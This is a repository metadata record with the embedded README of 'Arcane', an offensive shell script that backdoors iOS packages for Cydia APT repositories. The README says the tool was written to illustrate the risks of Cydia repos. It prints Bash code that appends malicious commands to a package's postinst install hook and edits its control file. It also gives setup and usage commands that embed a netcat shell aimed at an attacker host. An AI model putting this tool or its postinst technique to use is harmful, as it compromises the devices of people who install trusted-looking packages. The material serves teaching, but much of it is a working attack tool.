{"id":17383092,"url":"https://github.com/tokyoneon/arcane","last_synced_at":"2025-08-19T05:07:07.437Z","repository":{"id":40342432,"uuid":"282133655","full_name":"tokyoneon/Arcane","owner":"tokyoneon","description":"Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories.","archived":false,"fork":false,"pushed_at":"2020-08-04T02:33:34.000Z","size":805,"stargazers_count":158,"open_issues_count":0,"forks_count":28,"subscribers_count":13,"default_branch":"master","last_synced_at":"2025-08-16T21:53:26.663Z","etag":null,"topics":["apt","arm","arm64","attack","backdoor","cydia","cydia-repo","debian-packages","information-security","ios","iphone","kali","kali-linux","kali-scripts","offensive-security","payload","penetration-testing","shell","shell-script","shell-scripts"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tokyoneon.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-07-24T05:45:10.000Z","updated_at":"2025-07-15T09:49:28.000Z","dependencies_parsed_at":"2022-07-06T16:32:21.127Z","dependency_job_id":null,"html_url":"https://github.com/tokyoneon/Arcane","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/tokyoneon/Arcane","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tokyoneon","download_url":"https://codeload.github.com/tokyoneon/Arcane/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271103202,"owners_count":24699646,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apt","arm","arm64","attack","backdoor","cydia","cydia-repo","debian-packages","information-security","ios","iphone","kali","kali-linux","kali-scripts","offensive-security","payload","penetration-testing","shell","shell-script","shell-scripts"],"created_at":"2024-10-16T07:40:34.343Z","updated_at":"2025-08-19T05:07:07.386Z","avatar_url":"https://github.com/tokyoneon.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. It was created for [this publication](https://null-byte.com/a-0325421/) to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.\n\n![](images/arcane.gif)\n\n---\n\n### How Arcane works...\n\nTo understand what's happening in the GIF, decompress a package created with Arcane.\n```\ndpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp\n```\n\nNotice the `control` and `postinst` files in the `DEBIAN` directory. Both files are important.\n```\ntree /tmp/whois-decomp/\n\n/tmp/whois-decomp/\n├── DEBIAN\n│   ├── control\n│   └── postinst\n└── usr\n    └── bin\n        └── whois\n```\n\nIt's possible to supply scripts as part of a package when installing or removing applications. [Package maintainer scripts](https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html) include the [preinst, postinst, prerm, and postrm](https://wiki.debian.org/MaintainerScripts) files. Arcane takes advantage of the `postinst` file to execute commands during the installation.\n```bash\n# The \"post-installation\" file. This file is generally responsible\n# for executing commands on the OS after installing the required\n# files. It's utilized by developers to manage and maintain various\n# aspects of an installation. Arcane abuses this functionality by\n# appending malicious Bash commands to the file.\npostinst=\"$tmp/DEBIAN/postinst\";\n\n# A function to handle the type of command execution embedded into the\n# postinst file.\nfunction inject_backdoor ()\n{\n    # If --file is used, `cat` the command(s) into the postinst file.\n    if [[ \"$infile\" ]]; then\n        cat \"$infile\" \u003e\u003e \"$postinst\";\n        embed=\"[$infile]\";\n    else\n        # If no --file, utilize the simple Bash payload, previously\n        # defined.\n        echo -e \"$payload\" \u003e\u003e \"$postinst\";\n        embed=\"generic shell command\";\n    fi;\n    status \"embedded $embed into postinst\" \"error embedding backdoor\";\n    chmod 0755 \"$postinst\"\n};\n```\n\nThe [control](https://www.debian.org/doc/debian-policy/ch-controlfields.html) file contains values that package management tools use when installing packages. Arcane will either modify an existing `control` or create it.\n```bash\n# The \"control\" file template. Most iOS packages will include a\n# control file. In the event one is not found, Arcane will use the\n# below template. The `$hacker` variable is used here to occupy\n# various arbitrary fields.\n# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html\ncontrolTemp=\"Package: com.$hacker.backdoor\nName: $hacker backdoor\nVersion: 1337\nSection: app\nArchitecture: iphoneos-arm\nDescription: A backdoored iOS package\nAuthor: $hacker \u003chttps://$hacker.github.io/\u003e\nMaintainer: $hacker \u003chttps://$hacker.github.io/\u003e\";\n\n...\n\n# An `if` statement to check for the control file.\nif [[ ! -f \"$tmp/DEBIAN/control\" ]]; then\n    # If no control is detected, create it using the template.\n    echo \"$controlTemp\" \u003e \"$tmp/DEBIAN/control\";\n    status \"created control file\" \"error with control template\";\nelse\n    # If a control file exists, Arcane will simply rename the package\n    # as it appears in the list of available Cydia applications. This\n    # makes the package easier to location in Cydia.\n    msg \"detected control file\" succ;\n    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' \"$tmp/DEBIAN/control\";\n    status \"modified control file\" \"error with control\";\nfi;\n```\n\n### Usage\n\nClone the repository in Kali v2020.3.\n```\nsudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies\nsudo git clone https://github.com/tokyoneon/arcane /opt/arcane\nsudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane\nchmod +x arcane.sh;./arcane.sh --help\n```\n\nEmbed a command into a given package. See [article](https://null-byte.com/a-0325421/) for more info.\n```\n./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost \u003cattacker\u003e --lport \u003c4444\u003e --cydia --netcat\n```\n\n### Package samples\n\nThe repo includes packages for testing.\n```\nls -la samples/\n\n-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb\n-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb\n-rw-r--r-- 1 root root  76688 Aug 29  2018 sed_4.5-1_iphoneos-arm.deb\n-rw-r--r-- 1 root root  60866 Jul  8 21:03 top_39-2_iphoneos-arm.deb\n-rw-r--r-- 1 root root  13810 Aug 29  2018 whois_5.3.2-1_iphoneos-arm.deb\n```\n\nMD5 sums, as found on the official [Bingner repository](https://apt.bingner.com/).\n```\nmd5sum samples/*.deb\n\n3f1712964701580b3f018305a55e217c  samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb\n795ccf9c6d53dd60d2f74f7a601f474f  samples/network-cmds_543-1_iphoneos-arm.deb\na020882dac121afa4b03c63304d729b0  samples/sed_4.5-1_iphoneos-arm.deb\n38db275007a331e7ff8899ea22261dc7  samples/top_39-2_iphoneos-arm.deb\nb40ee800b72bbac323568b36ad67bb16  samples/whois_5.3.2-1_iphoneos-arm.deb\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftokyoneon%2Farcane","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftokyoneon%2Farcane","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftokyoneon%2Farcane/lists"}